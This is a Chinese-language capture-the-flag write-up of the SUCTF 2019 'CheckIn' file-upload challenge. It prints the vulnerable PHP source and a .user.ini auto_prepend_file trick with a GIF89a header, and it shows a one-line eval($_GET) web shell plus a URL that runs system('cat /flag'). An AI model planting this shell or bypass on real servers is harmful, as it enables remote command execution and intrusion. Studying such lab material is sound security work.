[SUCTF 2019]CheckIn

1.代码审计

进入页面，要我们上传文件，那么应该是让我们传一句话马。
发现题目有源码。查看源码，关键代码。

<?php
// error_reporting(0);
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
if (!file_exists($userdir)) {
    
    mkdir($userdir, 0777, true);
}
file_put_contents($userdir . "/index.php", "");
if (isset($_POST["upload"])) {
    
    $tmp_name = $_FILES["fileUpload"]["tmp_name"];
    $name = $_FILES["fileUpload"]["name"];
    if (!$tmp_name) {
    
        die("filesize too big!");
    }
    if (!$name) {
    
        die("filename cannot be empty!");
    }
    $extension = substr($name, strrpos($name, ".") + 1);
    if (preg_match("/ph|htacess/i", $extension)) {
    
        die("illegal suffix!");
    }
    if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {
    
        die("&lt;? in contents!");
    }
    $image_type = exif_imagetype($tmp_name);
    if (!$image_type) {
    
        die("exif_imagetype:not image!");
    }
    $upload_file_path = $userdir . "/" . $name;
    move_uploaded_file($tmp_name, $upload_file_path);
    echo "Your dir " . $userdir. ' <br>';
    echo 'Your files : <br>';
    var_dump(scandir($userdir));
}

首先我们要上传了文件，然后对我们上传文件名进行了过滤，不能有ph/htaccess。随后对我们的文件内容进行了过滤，不能有<?,最后对我们的文件类型进行了检测，必须是image类型。

2…user.ini文件利用

这里我们不能上传后缀名与php有关的，所以我们需要服务器要对我们的jpg文件当作php来解析，所以首先我们想到的是htaccess配置文件利用，但是这里是nginx，而htaccess是对apache的配置。所以我们这里利用.user.ini文件进行修改配置，让服务器对我们上传的图片马进行解析。

1…user.ini

.user.ini实际上就是一个可以由用户“自定义”的php.ini，我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。
其中有两个配置，可以用来制造后门：
auto_append_file、auto_prepend_file
指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。而auto_append_file类似，只是在文件后面包含。 使用方法很简单，直接写在.user.ini中

上传.uer.ini文件

GIF89a
auto_prepend_file=1.jpg

在文件头加入GIF89a绕过对文件类型的检测。
上传图片马1.jpg

GIF89a
<script language='php'>eval($_GET['a']);</script>

访问同目录下的index.php得到flag

http://61d42b17-b88c-4674-9e1f-3f76be1d5736.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php?a=system(%27cat%20/flag%27);